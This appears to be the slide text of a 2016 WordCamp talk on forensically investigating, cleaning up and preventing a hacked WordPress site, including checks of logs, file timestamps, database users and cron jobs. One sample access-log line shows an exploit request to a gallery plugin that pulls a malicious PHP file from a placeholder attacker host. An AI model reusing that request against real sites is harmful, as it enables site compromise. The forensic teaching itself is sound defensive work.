Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
1. Post-Mortem of a
Hacked Website
Presented By: Tim Butler – Conetix
WordCamp Sunshine Coast 2016
Twitter: @timbutler
2. Who Am I?
Tim Butler
Enterprise Manager – Conetix
● 5 years in the hosting industry
● Previous - IT Security Manager within Federal Government
● Using WordPress since 2005
● Clean-up 2-5 hacked websites a week
3. In this talk….
➔What happens when you’re hacked
➔Deep Analysis
➔Clean Up
➔Prevention
4. But before we start….
Prevention is better than the cure
Backup Backup Backup!
(and then take an other backup)
6. How do you know if you’ve been hacked?
• Used to be simple (but annoying) defacing
• Poor site performance
• Emails bouncing
• Google was nice enough to let you know
8. Why was I hacked?
• You probably weren’t targeted specifically
• DoS attacks
• Phishing
• Spam
• Bot to hack other sites
9. Why was I hacked?
Google discover over 100,000 infected sites
per month
100 billion estimated cost of cybercrime
10. So… I’ve been hacked
• Hackers want to have the system exploited
for as long as possible
• Many exploits avoid Google / Chrome to
remain undetected
• Obfuscated code
• Self morphing code
11. So… I’ve been hacked
Basically, it’s one big game of cat and mouse
Source: simpsons.wikia.com
17. Step1: Don’t Touch Anything
Treat it like a crime scene
You need to preserve the digital forensics
18. Step1: Don’t Touch Anything
• Webserver log files
• Server log files
• File timestamps
• Talk to your host!
Most important part is to find the point of origin
19. Step1: Don’t Touch Anything
If you need your website back up immediately,
restore your most recent backup to a new
hosting subscription and update DNS
25. Step 2: Forensic Analysis
Reality
• Lots of digging through log files
• Lots of referencing file modifications times
• Lots of low-level, tech work
27. Step 2: Forensic Analysis
Access Log Files
• First item to check
• Look for suspicious POST calls
• Looking for the result of the hack to start
with, not the cause
28. Step 2: Forensic Analysis
POST Calls
• Need to sort the good from the bad
grep POST access_log | wc -l
• 1,412 results
What to look for
Where to look for it
Quickly count the results
33. Step 2: Forensic Analysis
File Creation / Modification Times
• We know the malicious file is
wp-content/plugins/legit-looking/plugin/safefile.php
• Let’s look at the modification time:
ls –l safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Mar 23 2013
safefile.php
• Also check the creation time:
34. Step 2: Forensic Analysis
File Creation / Modification Times
• Also check the creation time:
ls –lc safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Apr 18 02:45
safefile.php
• Dates can be manipulated! Here’s were we need to search
35. Step 2: Forensic Analysis
Recheck Access Logs
grep “[18/Apr/2016:02:45” access_log
This may give us something like:
xxx.xxx.xxx.xxx - - [18/Apr/2016:02:45:00 +1000] "GET /wp-content/plugins/robo-
gallery/includes/rbs_gallery_ajax.php?function=file_put_contents(%22http%3A%2F%2F
hackerssite%2Fscripts%2Fsafefile.php%22) HTTP/1.1" 200 449954 "-" "Mozilla/5.0
(Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0“
40. Step 3: The Clean Up
• 10x as much work
If there’s no backups…
• Hackers love to leave backdoors to regain
access
41. Step 3: The Clean Up
Remove infected files
• Malicious files
• Look for other files
They can modify every other file in your site
42. Step 3: The Clean Up
Check for Database changes
• Inserted users
• Updated passwords/ privileges for non-
admin users
43. Step 3: The Clean Up
Cron Jobs
• Scheduled re-infections
• Check your web control panel / raw cron
44. Step 3: The Clean Up
RBL Blacklists
• If you were spamming, automated systems
notice
• Use an RBL lookup to check
- Senderbase (used by Telstra / Optus etc) don’t
allow you to automate scans
- Nor does Hotmail / Outlook / Office365 / Google
50. Step 4: Prevention
Keep your software up-to-date
• One gotcha to be aware of:
Paid Themes with Plugins
- may not auto update
- may require an active subscription
• Remove (don’t just disable) unused themes / plugins
51. Step 4: Prevention
Secure Passwords
• Unique password per site / login
• Use a password manager
• Length is more important than complexity
(12+ characters is good)
53. Step 4: Prevention
Server / Hosting Protection
• CloudFlare Pro / Web Application Firewall
• Limit each site to one user
• Don’t keep old directories / backups on the
server